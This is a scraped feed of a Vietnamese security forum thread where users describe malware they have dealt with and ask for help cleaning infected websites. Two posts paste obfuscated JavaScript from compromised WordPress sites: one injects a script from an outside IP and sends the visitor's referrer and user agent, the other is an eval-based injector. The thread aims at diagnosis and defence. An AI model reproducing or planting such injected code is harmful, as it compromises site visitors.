<![CDATA[Latest posts for the topic "Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi?"]]> /hvaonline/posts/list/28.html JForum - http://www.jforum.net Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#171581 /hvaonline/posts/list/27945.html#171581 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#174142 /hvaonline/posts/list/27945.html#174142 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#174146 /hvaonline/posts/list/27945.html#174146 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#174150 /hvaonline/posts/list/27945.html#174150 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#174152 /hvaonline/posts/list/27945.html#174152 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi?

sadboy309 wrote:
Mình nhớ nó có File là Image.exe , sau khi Nod32 luộc nó thì mình ko Login vào Win được nữa. 
Rất tiếc là với chỉ riêng tên file này và tên antivirus chưa đủ để xác định tên tuổi malware . Mời mọi người tiếp tục .]]>
/hvaonline/posts/list/27945.html#174155 /hvaonline/posts/list/27945.html#174155 GMT
Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#174166 /hvaonline/posts/list/27945.html#174166 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#174170 /hvaonline/posts/list/27945.html#174170 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#174179 /hvaonline/posts/list/27945.html#174179 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống c /hvaonline/posts/list/27945.html#176818 /hvaonline/posts/list/27945.html#176818 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống c

evarist wrote:
Loại nguy hiểm nhất em gặp cho đến giờ là Kido.ih.Giờ chắc nó không nguy hiểm mấy nữa nhỉ ? Con này không hiểu sao Kas của em up to date có nhận ra mà không delete được.Các anh có thể chỉ cho em biết lý do không ạ ? 
Nếu muốn nhận sự giúp đỡ , bạn xem lại 2 post đầu tiên trong topic này và làm theo đầy đủ . Tốt nhất là bạn tham gia vào topic này : /hvaonline/posts/list/28558.html]]>
/hvaonline/posts/list/27945.html#176861 /hvaonline/posts/list/27945.html#176861 GMT
Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#176936 /hvaonline/posts/list/27945.html#176936 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#177027 /hvaonline/posts/list/27945.html#177027 GMT Re: Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi?

angel_of_devil wrote:
Lần khủng khiếp nhất cho đến giờ ở cty mình là dính con Dasfer - giả mạo gateway của Tàu. Còn mấy con như kiểu login/logoff có gặp nhưng ko mất nhiều thời gian để xử lý. 
Hì, cảm ơn bạn đã chia sẻ , con Dasfer đúng là khá vất vả khi mình vật lộn với nó qua giới thiệu của kamikazeq , mình cũng xếp nó vào những malware phá hoại nguy hiểm .]]>
/hvaonline/posts/list/27945.html#177041 /hvaonline/posts/list/27945.html#177041 GMT
Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ; Hiện tại mình đã hồi phục. Nhưng ko biết còn bị nữa không. Bạn có thể cho mình biết cách nào nó đã lây vào các file *.js có trong host của mình không ? các file js đều là hàm chạy nội bộ chỉ xử lý animation, mình dùng wordpress. Thân,]]> /hvaonline/posts/list/27945.html#253867 /hvaonline/posts/list/27945.html#253867 GMT Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? Warning In order not to compromise your security, this page will not be accessed A virus or unwanted program was found in the HTTP data of the requested page. Requested URL: /hvaonline/posts/review/0/27945.html Information: Contains recognition pattern of the JS/Infected.A Java script virus  ]]> /hvaonline/posts/list/27945.html#254629 /hvaonline/posts/list/27945.html#254629 GMT Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi?

paranoidx wrote:
Không biết ở đây còn nhận hàng không. Mình bị 1 con gì chả biết, nó lây lan trên website của mình, đây là đoạn mã của nó : var _0x80d0=["\x64\x67\x6C\x6C\x68\x67\x75\x6B","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x33\x31\x2E\x31\x38\x34\x2E\x32\x34\x32\x2E\x31\x30\x32\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0x80d0[1]](_0x80d0[0]);if(!element){dawdafraawegdhdhd=document[_0x80d0[2]];gfjlhggfdghdd=escape(document[_0x80d0[3]]);hgfjkgkffgsdgd=escape(navigator[_0x80d0[4]]);var js=document[_0x80d0[6]](_0x80d0[5]);js[_0x80d0[7]]=_0x80d0[0];js[_0x80d0[8]]=_0x80d0[9]+gfjlhggfdghdd+_0x80d0[10]+dawdafraawegdhdhd+_0x80d0[11]+hgfjkgkffgsdgd;var head=document[_0x80d0[13]](_0x80d0[12])[0];head[_0x80d0[14]](js);} ; Hiện tại mình đã hồi phục. Nhưng ko biết còn bị nữa không. Bạn có thể cho mình biết cách nào nó đã lây vào các file *.js có trong host của mình không ? các file js đều là hàm chạy nội bộ chỉ xử lý animation, mình dùng wordpress. Thân, 
TimThumb trong theme có lỗ hổng , và lỗ hổng này cũng bị khai thác khá nhiều rồi http://www.exploit-db.com/wordpress-timthumb-exploitation mong bạn bol có thể chỉ giáo thêm, về phần này mình mù tịt]]>
/hvaonline/posts/list/27945.html#254634 /hvaonline/posts/list/27945.html#254634 GMT
Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi? /hvaonline/posts/list/27945.html#254636 /hvaonline/posts/list/27945.html#254636 GMT Những malware phá hoại nguy hiểm nào các bạn đã từng xử lí/chống chọi?
2- Mình vào webmaster tool thì google báo! <script type='text/javascript'>var a=!1;o_vrg = "\x6C\x6F\x6 E\x6C\x79";if(!document.cookie.match(o_vrg)){if(window.docum ent)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)=== 0){ss='';try{if(/12/.exec(23).index==0);}catch(qqq){s=String ;}ee='e';e=window.eval;t='y';}h=2*Math.cos(Math.PI);n=[3.5,3 .5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,4 9.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50. 5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,2 3,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19 ,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5 ,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49 .5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,1 8.5,51,57,57,55,28,22.5,22.5,56.5,49.5,53.5,51.5,55,56,54.5, 22,57.5,52.5,22,53.5,54,22.5,51.5,54,22,48.5,50.5,51.5,30.5, 24,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,4 9.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,5 3,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,2 8,51]]>
/hvaonline/posts/list/27945.html#254639 /hvaonline/posts/list/27945.html#254639 GMT